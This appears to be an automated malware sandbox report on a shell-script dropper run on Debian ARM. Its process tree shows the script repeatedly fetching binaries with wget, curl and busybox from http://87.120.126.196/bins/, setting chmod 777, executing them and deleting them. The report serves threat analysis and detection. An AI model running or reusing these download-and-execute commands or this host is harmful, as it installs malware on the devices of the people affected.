Analysis
max time kernel
15s
max time network
16s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags
arch:armhf image:debian9-armhf-20240729-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system
submitted
25/10/2024, 01:21
Static task
static1
Behavioral task
behavioral1
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-mipsel-20240611-en
General
Target
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Size
10KB
MD5
8695c3f5bc9a782d939a590ce31f75f3
SHA1
914e569c0a6610aac0f3009b5b8970f722aab8df
SHA256
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e
SHA512
ca0e16c73a69de5d269bec40b6c389461cb0930553830b76e87bcd98c43bcc506fc81cdfedd919445aed23d40b6c0b45cc902815318deb69fa37f0909fd77b3b
SSDEEP
192:5P8Pu15ABxEJ3AUJMkxiq6tiZEuy15ABxGAUJMkxeq6tiZEL:5P8Pu15ABxEJ3AUJMkxnTy15ABxGAUJe
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 15 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
749  chmod
766  chmod
808  chmod
841  chmod
694  chmod
731  chmod
795  chmod
847  chmod
757  chmod
780  chmod
823  chmod
682  chmod
817  chmod
829  chmod
835  chmod
Executes dropped EXE (15 IoCs)
ioc                                      pid  Process
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh  684  l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt  695  tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9  733  yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh  750  5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI  758  9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH  768  FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz  782  LQM2q0nlR58Eihs83rY31Yor6mBJko63jz
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN  796  94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11  809  WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk  818  TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM  824  cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo  830  GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd  836  0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl  842  RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd  848  0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd
Checks CPU configuration (1 TTPs, 15 IoCs)
Checks CPU information, which indicates whether the system is a virtual machine.
description              ioc            Process
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
Reads runtime system information
description              ioc                            Process
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
Writes file to tmp directory (15 IoCs)
Malware often drops required files in the /tmp directory.
description                   ioc                                      Process
File opened for modification  /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt  curl
File opened for modification  /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh  curl
File opened for modification  /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN  curl
File opened for modification  /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11  curl
File opened for modification  /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo  curl
File opened for modification  /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9  curl
File opened for modification  /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH  curl
File opened for modification  /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM  curl
File opened for modification  /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl  curl
File opened for modification  /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz  curl
File opened for modification  /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh  curl
File opened for modification  /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI  curl
File opened for modification  /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk  curl
File opened for modification  /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd  curl
File opened for modification  /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd  curl
Processes
image | command line | PID | signatures
- /tmp/2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh | /tmp/2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh | PID 655
  - /bin/rm | /bin/rm bins.sh | PID 657
  - /usr/bin/wget | wget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh | PID 662
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh | PID 669 | Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh | PID 680
  - /bin/chmod | chmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh | PID 682 | File and Directory Permissions Modification
  - /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh | ./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh | PID 684 | Executes dropped EXE
  - /bin/rm | rm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh | PID 685
  - /usr/bin/wget | wget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt | PID 686
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt | PID 690 | Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt | PID 692
  - /bin/chmod | chmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt | PID 694 | File and Directory Permissions Modification
  - /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt | ./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt | PID 695 | Executes dropped EXE
  - /bin/rm | rm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt | PID 696
  - /usr/bin/wget | wget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 | PID 697
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 | PID 705 | Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 | PID 724
  - /bin/chmod | chmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 | PID 731 | File and Directory Permissions Modification
  - /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 | ./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 | PID 733 | Executes dropped EXE
  - /bin/rm | rm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 | PID 734
  - /usr/bin/wget | wget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh | PID 735
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh | PID 739 | Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh | PID 746
  - /bin/chmod | chmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh | PID 749 | File and Directory Permissions Modification
  - /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh | ./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh | PID 750 | Executes dropped EXE
  - /bin/rm | rm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh | PID 751
  - /usr/bin/wget | wget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI | PID 752
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI | PID 754 | Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI | PID 756
  - /bin/chmod | chmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI | PID 757 | File and Directory Permissions Modification
  - /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI | ./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI | PID 758 | Executes dropped EXE
  - /bin/rm | rm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI | PID 759
  - /usr/bin/wget | wget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH | PID 760
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH | PID 761 | Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH | PID 762
  - /bin/chmod | chmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH | PID 766 | File and Directory Permissions Modification
  - /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH | ./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH | PID 768 | Executes dropped EXE
  - /bin/rm | rm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH | PID 769
  - /usr/bin/wget | wget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz | PID 770
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz | PID 773 | Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz | PID 777
  - /bin/chmod | chmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz | PID 780 | File and Directory Permissions Modification
  - /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz | ./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz | PID 782 | Executes dropped EXE
  - /bin/rm | rm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz | PID 783
  - /usr/bin/wget | wget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN | PID 784
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN | PID 787 | Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN | PID 792
  - /bin/chmod | chmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN | PID 795 | File and Directory Permissions Modification
  - /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN | ./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN | PID 796 | Executes dropped EXE
  - /bin/rm | rm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN | PID 797
  - /usr/bin/wget | wget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 | PID 798
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 | PID 802 | Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 | PID 806
  - /bin/chmod | chmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 | PID 808 | File and Directory Permissions Modification
  - /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 | ./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 | PID 809 | Executes dropped EXE
  - /bin/rm | rm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 | PID 811
  - /usr/bin/wget | wget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk | PID 812
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk | PID 815 | Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk | PID 816
  - /bin/chmod | chmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk | PID 817 | File and Directory Permissions Modification
  - /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk | ./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk | PID 818 | Executes dropped EXE
  - /bin/rm | rm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk | PID 819
  - /usr/bin/wget | wget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM | PID 820
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM | PID 821 | Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM | PID 822
  - /bin/chmod | chmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM | PID 823 | File and Directory Permissions Modification
  - /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM | ./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM | PID 824 | Executes dropped EXE
  - /bin/rm | rm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM | PID 825
  - /usr/bin/wget | wget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo | PID 826
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo | PID 827 | Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo | PID 828
  - /bin/chmod | chmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo | PID 829 | File and Directory Permissions Modification
  - /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo | ./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo | PID 830 | Executes dropped EXE
  - /bin/rm | rm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo | PID 831
  - /usr/bin/wget | wget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd | PID 832
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd | PID 833 | Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd | PID 834
  - /bin/chmod | chmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd | PID 835 | File and Directory Permissions Modification
  - /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd | ./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd | PID 836 | Executes dropped EXE
  - /bin/rm | rm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd | PID 837
  - /usr/bin/wget | wget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl | PID 838
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl | PID 839 | Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl | PID 840
  - /bin/chmod | chmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl | PID 841 | File and Directory Permissions Modification
  - /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl | ./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl | PID 842 | Executes dropped EXE
  - /bin/rm | rm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl | PID 843
  - /usr/bin/wget | wget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd | PID 844
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd | PID 845 | Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd | PID 846
  - /bin/chmod | chmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd | PID 847 | File and Directory Permissions Modification
  - /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd | ./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd | PID 848 | Executes dropped EXE
  - /bin/rm | rm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd | PID 849
  - /usr/bin/wget | wget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl | PID 850
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97